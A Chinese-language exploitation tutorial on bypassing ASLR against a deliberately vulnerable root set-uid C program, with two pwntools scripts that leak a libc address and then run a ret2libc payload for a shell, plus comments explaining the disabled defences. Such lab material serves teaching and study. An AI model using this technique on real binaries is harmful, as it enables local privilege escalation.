绕过 ASLR -- 第二部分
漏洞代码
//vuln.c
#include <stdio.h>
#include <string.h>
/* Intentionally vulnerable target used by the write-up.
 * Copies argv[1] into a fixed 256-byte stack buffer, echoes it and returns 0.
 * argc is never checked, so running it without an argument passes a NULL
 * argv[1] to strcpy and crashes. */
int main(int argc, char* argv[]) {
char buf[256];
/* Unbounded copy: an argv[1] longer than 256 bytes runs past buf into the
 * saved frame data and the return address (the write-up's offset is 268).
 * A length-checked copy, e.g. snprintf(buf, sizeof buf, "%s", argv[1])
 * after an argc check, removes the overflow entirely. */
strcpy(buf,argv[1]);
printf("%s\n",buf);
fflush(stdout);
return 0;
}
编译命令
# Leading '#' is the root prompt (or comments the line out -- the write-up does not say which).
# Value 2 is the kernel's full randomization setting: stack, mmap/shared libraries and brk.
#echo 2 > /proc/sys/kernel/randomize_va_space
# -fno-stack-protector drops the stack canary, so the saved return address can be
# overwritten undetected; -g only adds debug info. No -no-pie/-fpie is given, so
# whether the result is PIE depends on the toolchain default -- verify with checksec.
# Keeping the canary and building as PIE are the two compile-time defences this
# write-up deliberately turns off.
$gcc -fno-stack-protector -g -o vuln vuln.c
# Root-owned with the set-uid bit: this is what turns a local overflow into a
# privilege gain. Without the set-uid bit the same bug only affects the caller.
$sudo chown root vuln
$sudo chgrp root vuln
$sudo chmod +s vuln
这次也可以用之前学过的方法：先泄露 libc 版本，再获取 system 函数和 binsh 的地址。因为没有找到 system_arg，所以还是使用泄露 libc 的方法。
首先确定偏移量
仍然是268
EXP1 泄露出__libc_start_main函数的真实地址
# EXP1 -- leak stage (Python 2 script; see the print statement in EXP2).
# Runs the target once with a crafted argv[1] so that, when main returns,
# puts() is called on the GOT entry of __libc_start_main and prints that
# function's address inside the libc loaded in this process. The value is
# read off the debug output by hand and copied into EXP2.
from pwn import *
from LibcSearcher import LibcSearcher  # not used in this stage
context.log_level = 'debug'  # debug level shows the raw bytes received below
vuln = ELF('./vuln')
# Both addresses are read from the binary and embedded as fixed 32-bit
# values, which only holds for a non-PIE build -- NOTE(review): confirm
# with checksec; a PIE build would randomize them along with everything else.
puts_plt = vuln.plt['puts']
__libc_start_main_got = vuln.got['__libc_start_main']
# 268 bytes of padding reach the saved return address (offset found earlier),
# then: the new return address (puts@plt), a placeholder return address for
# puts itself ("AAAA"), and puts's argument (the GOT slot to print).
payload = "A"*268 + p32(puts_plt) + "AAAA" + p32(__libc_start_main_got)
# NOTE(review): EXP2 launches './vuln'; confirm that bare 'vuln' resolves to the same file.
sh = process(['vuln',payload])
# Output: the echoed buffer from printf, followed by the pointer bytes puts()
# prints from the GOT slot (little-endian, up to the first NUL byte).
sh.recv()
获取到 __libc_start_main 函数的真实地址 0xf7e1d540
再使用 LibcSearcher 查询 libc 版本，继而找到 system 与 binsh 的地址
完成调用
EXP2
# EXP2 -- exploitation stage (Python 2 syntax: note the print statement below).
# Takes the address leaked by EXP1, identifies the libc build with LibcSearcher,
# derives the addresses of system() and the "/bin/sh" string from it, and runs
# the target a second time with a classic ret2libc payload.
from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = 'debug'
vuln = ELF('./vuln')
puts_plt = vuln.plt['puts']  # unused in this stage; carried over from EXP1
__libc_start_main_got = vuln.got['__libc_start_main']  # unused here; carried over from EXP1
# The EXP1 leak stage, disabled by turning it into a bare string literal.
"""payload = "A"*268 + p32(puts_plt) + "AAAA" + p32(__libc_start_main_got)
sh = process(['vuln',payload])
sh.recv()"""
# Hard-coded value read from the EXP1 run. It is the address of
# __libc_start_main in the libc mapping of *that* process, so it is only
# meaningful for that run's libc placement -- NOTE(review): confirm against
# the randomize_va_space setting actually in effect.
__libc_start_main_addr = 0xf7e1d540
log.success('start to get libc')
# Ask LibcSearcher which known libc build places __libc_start_main at an
# address consistent with the leaked value (it matches the symbol's page offset).
libc = LibcSearcher('__libc_start_main',__libc_start_main_addr)
# libc base = leaked absolute address - symbol offset inside that libc build.
libcbase = __libc_start_main_addr - libc.dump('__libc_start_main')
print "libcbase:"+hex(libcbase)
log.success('success get libcbase')
# Absolute addresses of system() and of the "/bin/sh" string in the loaded libc.
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')
log.success('now get shell')
# Same 268-byte padding as EXP1; then return into system(), a placeholder
# return address for system() ("AAAA"), and its argument: the "/bin/sh" pointer.
# A stack canary would reject this overwrite before main returns; without
# the set-uid bit (see the chmod in the build steps) it gains no privilege.
payload = "A"*268 + p32(system_addr) + "AAAA" + p32(binsh_addr)
sh = process(['./vuln',payload])
sh.interactive()